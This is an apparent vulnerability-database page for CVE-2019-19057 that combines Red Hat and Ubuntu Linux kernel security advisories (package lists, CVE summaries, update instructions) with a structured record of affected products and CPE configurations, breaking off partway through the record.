aarch64: bpftool-4.18.0-193.el8.aarch64.rpm bpftool-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-4.18.0-193.el8.aarch64.rpm kernel-core-4.18.0-193.el8.aarch64.rpm kernel-cross-headers-4.18.0-193.el8.aarch64.rpm kernel-debug-4.18.0-193.el8.aarch64.rpm kernel-debug-core-4.18.0-193.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debug-devel-4.18.0-193.el8.aarch64.rpm kernel-debug-modules-4.18.0-193.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-193.el8.aarch64.rpm kernel-devel-4.18.0-193.el8.aarch64.rpm kernel-headers-4.18.0-193.el8.aarch64.rpm kernel-modules-4.18.0-193.el8.aarch64.rpm kernel-modules-extra-4.18.0-193.el8.aarch64.rpm kernel-tools-4.18.0-193.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-tools-libs-4.18.0-193.el8.aarch64.rpm perf-4.18.0-193.el8.aarch64.rpm perf-debuginfo-4.18.0-193.el8.aarch64.rpm python3-perf-4.18.0-193.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-193.el8.aarch64.rpm

noarch: kernel-abi-whitelists-4.18.0-193.el8.noarch.rpm kernel-doc-4.18.0-193.el8.noarch.rpm

ppc64le: bpftool-4.18.0-193.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-4.18.0-193.el8.ppc64le.rpm kernel-core-4.18.0-193.el8.ppc64le.rpm kernel-cross-headers-4.18.0-193.el8.ppc64le.rpm kernel-debug-4.18.0-193.el8.ppc64le.rpm kernel-debug-core-4.18.0-193.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debug-devel-4.18.0-193.el8.ppc64le.rpm kernel-debug-modules-4.18.0-193.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-193.el8.ppc64le.rpm kernel-devel-4.18.0-193.el8.ppc64le.rpm kernel-headers-4.18.0-193.el8.ppc64le.rpm kernel-modules-4.18.0-193.el8.ppc64le.rpm kernel-modules-extra-4.18.0-193.el8.ppc64le.rpm kernel-tools-4.18.0-193.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-tools-libs-4.18.0-193.el8.ppc64le.rpm perf-4.18.0-193.el8.ppc64le.rpm perf-debuginfo-4.18.0-193.el8.ppc64le.rpm python3-perf-4.18.0-193.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-193.el8.ppc64le.rpm

s390x: bpftool-4.18.0-193.el8.s390x.rpm bpftool-debuginfo-4.18.0-193.el8.s390x.rpm kernel-4.18.0-193.el8.s390x.rpm kernel-core-4.18.0-193.el8.s390x.rpm kernel-cross-headers-4.18.0-193.el8.s390x.rpm kernel-debug-4.18.0-193.el8.s390x.rpm kernel-debug-core-4.18.0-193.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-193.el8.s390x.rpm kernel-debug-devel-4.18.0-193.el8.s390x.rpm kernel-debug-modules-4.18.0-193.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-193.el8.s390x.rpm kernel-debuginfo-4.18.0-193.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-193.el8.s390x.rpm kernel-devel-4.18.0-193.el8.s390x.rpm kernel-headers-4.18.0-193.el8.s390x.rpm kernel-modules-4.18.0-193.el8.s390x.rpm kernel-modules-extra-4.18.0-193.el8.s390x.rpm kernel-tools-4.18.0-193.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-193.el8.s390x.rpm perf-4.18.0-193.el8.s390x.rpm perf-debuginfo-4.18.0-193.el8.s390x.rpm python3-perf-4.18.0-193.el8.s390x.rpm python3-perf-debuginfo-4.18.0-193.el8.s390x.rpm

x86_64: bpftool-4.18.0-193.el8.x86_64.rpm bpftool-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-4.18.0-193.el8.x86_64.rpm kernel-core-4.18.0-193.el8.x86_64.rpm kernel-cross-headers-4.18.0-193.el8.x86_64.rpm kernel-debug-4.18.0-193.el8.x86_64.rpm kernel-debug-core-4.18.0-193.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debug-devel-4.18.0-193.el8.x86_64.rpm kernel-debug-modules-4.18.0-193.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-193.el8.x86_64.rpm kernel-devel-4.18.0-193.el8.x86_64.rpm kernel-headers-4.18.0-193.el8.x86_64.rpm kernel-modules-4.18.0-193.el8.x86_64.rpm kernel-modules-extra-4.18.0-193.el8.x86_64.rpm kernel-tools-4.18.0-193.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-tools-libs-4.18.0-193.el8.x86_64.rpm perf-4.18.0-193.el8.x86_64.rpm perf-debuginfo-4.18.0-193.el8.x86_64.rpm python3-perf-4.18.0-193.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-193.el8.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64: bpftool-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-193.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-193.el8.aarch64.rpm perf-debuginfo-4.18.0-193.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-193.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-193.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-193.el8.ppc64le.rpm perf-debuginfo-4.18.0-193.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-193.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-193.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-193.el8.x86_64.rpm perf-debuginfo-4.18.0-193.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-193.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXqhVdNzjgjWX9erEAQhD/w//dPnDo2yo4d8QrzWDVVkXPNxRzhSCh7Rc vCtSYPB6YMydkKglUvdHS+ZGv+N/1xs8CTpAZ59q3NTiw2FdkCPfSuJiTwdCyOwc xars8lYLd2yKv/yhHXh5HDOloRRK26cKANvpUXFJCmbOq/muSEyhRTKKG2t+Iijn lMzS6BIheasfjupsy3K2JGeZCjKlH7u1yulJVH4BaQZ/K04NxKjOWGnZ9eAoP6gp AwPGT9YYT3Eg24NTaUVHBsrWMF7ybDkWuRav8TBHT8Uukoztjmypi/5C925tbVGM Ln36s+wfwPuytgos3JcjYVFhAzPwdtay99ZlXukeJlVXBc/AZEqkE3tp1dOUz5o/ QwjX2TByLMa6XAMWtNjW8AOcx30VuG73EoYNussB/J9+1eeehj7VpdAp/AWQm7q0 dHe0U6Pzm48vWLvuBzuc1JLC87ssbIC1n4WrfyUm86ECT8WZ4TsF8FZwlrzMB8Au wPMo9RHXb4gU9WgSfdikOvZy8DnyUfSIPnlyK71iaa7rqRlPVWM/XqDq7so7KF1o 3dE9bquitvi5H8/sEsgRGiqA6tb1Lh+mjhbE5FQxAggKnXz83UpJjk9aSL3dj+yY W1XxCp5lPPLclygA8lo7sqgD6RCBjWxzyGZBK0SoLzv2qHzrhxBeM0mOmhH7xRb5 N2G5/HRp5K8=0ugo -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-4287-2 February 18, 2020

linux-azure vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-azure: Linux kernel for Microsoft Azure Cloud systems

Details:

USN-4287-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux kernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM.

It was discovered that the Linux kernel did not properly clear data structures on context switches for certain Intel graphics processors. A local attacker could use this to expose sensitive information. (CVE-2019-14615)

It was discovered that the Atheros 802.11ac wireless USB device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15099)

It was discovered that the HSA Linux kernel driver for AMD GPU devices did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. (CVE-2019-16229)

It was discovered that the Marvell 8xxx Libertas WLAN device driver in the Linux kernel did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. (CVE-2019-16232)

It was discovered that a race condition existed in the Virtual Video Test Driver in the Linux kernel. An attacker with write access to /dev/video0 on a system with the vivid module loaded could possibly use this to gain administrative privileges. (CVE-2019-18683)

It was discovered that the Renesas Digital Radio Interface (DRIF) driver in the Linux kernel did not properly initialize data. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2019-18786)

It was discovered that the Afatech AF9005 DVB-T USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-18809)

It was discovered that the btrfs file system in the Linux kernel did not properly validate metadata, leading to a NULL pointer dereference. An attacker could use this to specially craft a file system image that, when mounted, could cause a denial of service (system crash). (CVE-2019-19057)

It was discovered that the crypto subsystem in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19062)

It was discovered that the Realtek rtlwifi USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19063)

It was discovered that the RSI 91x WLAN device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19071)

It was discovered that the Atheros 802.11ac wireless USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19078)

It was discovered that the AMD GPU device drivers in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19082)

Dan Carpenter discovered that the AppleTalk networking subsystem of the Linux kernel did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-19227)

It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly handle ioctl requests to get emulated CPUID features. An attacker with access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-19332)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly handle certain conditions. An attacker could use this to specially craft an ext4 file system that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19767)

Gao Chuan discovered that the SAS Class driver in the Linux kernel contained a race condition that could lead to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-19965)

It was discovered that the Datagram Congestion Control Protocol (DCCP) implementation in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-20096)

Mitchell Frank discovered that the Wi-Fi implementation in the Linux kernel when used as an access point would send IAPP location updates for stations before client authentication had completed. A physically proximate attacker could use this to cause a denial of service. (CVE-2019-5108)

It was discovered that a race condition can lead to a use-after-free while destroying GEM contexts in the i915 driver for the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-7053)

It was discovered that the B2C2 FlexCop USB device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15291)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-4.15.0-1069-azure 4.15.0-1069.74~14.04.1 linux-image-azure 4.15.0.1069.55

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4287-2 https://usn.ubuntu.com/4287-1 CVE-2019-14615, CVE-2019-15099, CVE-2019-15291, CVE-2019-16229, CVE-2019-16232, CVE-2019-18683, CVE-2019-18786, CVE-2019-18809, CVE-2019-18885, CVE-2019-19057, CVE-2019-19062, CVE-2019-19063, CVE-2019-19071, CVE-2019-19078, CVE-2019-19082, CVE-2019-19227, CVE-2019-19332, CVE-2019-19767, CVE-2019-19965, CVE-2019-20096, CVE-2019-5108, CVE-2020-7053

. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

  • RT: update RT source tree to the RHEL-8.2 tree (BZ#1708716)

  • KVM-RT guest fails boot with emulatorsched (BZ#1712781)

  • 8 vCPU guest need max latency < 20 us with stress [RT-8.2] (BZ#1757165)

  • Request nx_huge_pages=N as default value to avoid kvm-rt guest large latency spike [rt-8] (BZ#1788352)

  • RT: Add rpm Provide of 'kernel' to indicate that this is a kernel package (BZ#1796284)

  • [RHEL8] RT kernel signed by test certificate and not Red Hat Secure Boot (BZ#1806871)

Enhancement(s):

  • update to the upstream 5.x RT patchset (BZ#1680161)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1410",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "fedoraproject",
        "version": "31"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.1"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.25"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.3r2"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.1"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30.5r3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.2"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.5"
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h610s"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.2"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.3.11"
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.20"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "5.3.11"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.3.11",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30.5r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.3r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "credits": {
    "@context": {
